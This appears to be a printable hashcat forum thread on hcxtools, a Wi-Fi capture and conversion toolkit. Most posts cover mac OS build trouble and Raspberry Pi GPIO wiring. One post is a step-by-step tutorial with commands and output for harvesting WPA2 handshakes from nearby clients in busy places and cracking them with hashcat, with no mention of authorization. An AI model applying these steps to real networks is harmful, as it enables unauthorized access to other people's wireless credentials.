hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - Printable Version +- hashcat Forum (https://hashcat.net/forum) +-- Forum: Misc (https://hashcat.net/forum/forum-15.html) +--- Forum: User Contributions (https://hashcat.net/forum/forum-25.html) +--- Thread: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats (/thread-6661.html) |
RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - QYQ - 07-22-2017 I have a problem when make install, there is no <linux/wireless.h> file my sys is mac os sierra 10.12.6 how can I find the losing file thanks. RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 07-22-2017 Hi. This is only the first fatal error you got. There will be much more... You will have to find a replacement for linux iwlib. The Apple Developer Connection website has a lot of articles which talk about porting progs between environments. You'll need to read these first (and similar articles on the Internet) to get a better sense of the issues involved. "Certainly, it can be done. In fact, it is fairly routine." But it's really too much for a forum-post here. And from hcxtools READ.me Requirements: Linux That's because I'm a very, very lazy coder. That means if there is a library which is able to do the job better than my tools, I'll use this lib. Maybe a solution: edit the Makefile and remove all entries wlandump-ng and wlanresponse (these are extrem hardware-near coded) then try to compile hcxtools maybe that works for you use a raspberry pi A+, B+ to capture do not use a raspberry pi 3 (wifi soc doesn't work - no monitor mode) do not use wlandump-ng or wlanresponse on virtual devices like monx (mon0,...) RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 07-22-2017 basic tutorial about the features to capture passwords from wlantraffic 1. Choose a place where you do expect to receive many, many clients. run wlandump-ng or wlanresponse for a while (one or more hours) using this options: on a notebook wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20 on a raspberry wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 128 -b -r -l -L -s 0 wlanresponse -i <mywlandevice> -o test.cap -t 3 -b -l -L mydevice is your WLAN device (it must be running allready in monitor mode on a real device - do not use virtual devices like mon0). Please download and use the attached test.cap for this tutorial test.cap.zip (Size: 739 bytes / Downloads: 45) Extract and copy the cap to a folder and open a terminal inside. 2. Let's check the cap: $ wlancapinfo -i test.cap input file.......: test.cap magic file number: 0xa1b2c3d4 (cap/pcap) major version....: 2 minor version....: 4 data link type...: 105 (DLT_IEEE802_11) [http://www.tcpdump.org/linktypes.html] packets inside...: 6 last pcap error..: flawless The cap looks like a normal cap, but you should convert it only by using wlancap2hcx, because there are informations inside, other tools are not able to strip. Let's convert the cap: $ wlancap2hcx -o test.hccapx -e wordlist test.cap start reading from test.cap 6 packets processed (6 wlan, 0 lan, 0 loopback) found 1 wpa2 AES Cipher, HMAC-SHA1 found 1 valid wpa handshake (by wlandump-ng/wlanresponse) You can see that there's a valid WPA2 handshakles inside and that wlandump-ng/wlanresponse initiates the authentication with the client. No accesspint captured - there is no need to capture an accesspoint to get the data! We use the -e option to save networknames and passwords to a file (it's a good idea to use this option everytime you run wlancap2hcx). $ ls test.hccapx test.cap wordlist now sort our wordlist $ sort wordlist | uniq > wordlistsort you need to do this, because there are many dupes inside. $ ls test.hccapx test.cap wordlist wordlistsort now run hashcat $ hashcat -m 2500 --potfile-path=hc2500.pot test.hccapx wordlistsort hashcat (v3.6.0-247-g8f2cbb26) starting... Session..........: hashcat Status...........: Cracked Hash.Type........: WPA/WPA2 Hash.Target......: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82) Time.Started.....: Sat Jul 22 09:59:12 2017 (0 secs) Time.Estimated...: Sat Jul 22 09:59:12 2017 (0 secs) Guess.Base.......: File (wordlistsort) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 0 H/s (0.36ms) Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 2/2 (100.00%) Rejected.........: 0/2 (0.00%) Restore.Point....: 0/2 (0.00%) Candidates.#1....: AXNDFNEU -> UPC501953949 HWMon.Dev.#1.....: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8 Take a look into the potfile and you can imagine what's going on. You cracked the hash, using the captured password from wlantraffic. It's a good Idea to add/copy/cat the wordlist to your wordlist(s) - everytime you run wlancap2hcx on new cap files. RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - QYQ - 07-22-2017 (07-22-2017, 09:36 AM)ZerBea Wrote: Hi. Ok, I will have a try. Thanks anyway. RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 07-22-2017 Well, let's see how it works. How about hcxkeys. Are you able to compile them? RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - DaKahuna - 07-23-2017 (07-22-2017, 06:33 AM)QYQ Wrote: I have a problem when make install, there is no <linux/wireless.h> file Run an Ubuntu VM in VMware Fusion. Works very well. You will need to use a supported USB WiFi adapter but you would want to do that anyway. RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 08-03-2017 Read more about the authentication process and the importance of the message M2 here: https://hashcat.net/forum/thread-6745-post-36007.html#pid36007 RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - winxp5421 - 08-04-2017 Can you post up a clear GPIO pin out and what is needed for the Hardware mod. I would assume a switch and a couple LED's. but a pinout explanation would be nice. Thanks, Winxp RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 08-04-2017 Circuit: https://github.com/ZerBea/hcxtools/blob/master/gpiowait.odg Parts: 1 x LED, Low-Current (Kingbright 2.2 V, 2 mA) 1 x Resistor 10k Ohms 1 x Resistor 330 Ohms 1 Push Button 20cm cable GPIO pin pin GPIO ------------------------------------- 3V3 1 5V 1/3 (SCL) 6 0V 4 7 14 (TXD) 17 (ce1) 11 18 (ce0) Basic turorial how to "wiringpi" https://www.sunfounder.com/forum/how-to-apply-wiringpi-gpio-on-raspberry-pi/?p=1 RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - winxp5421 - 08-04-2017 Thanks, much obliged. |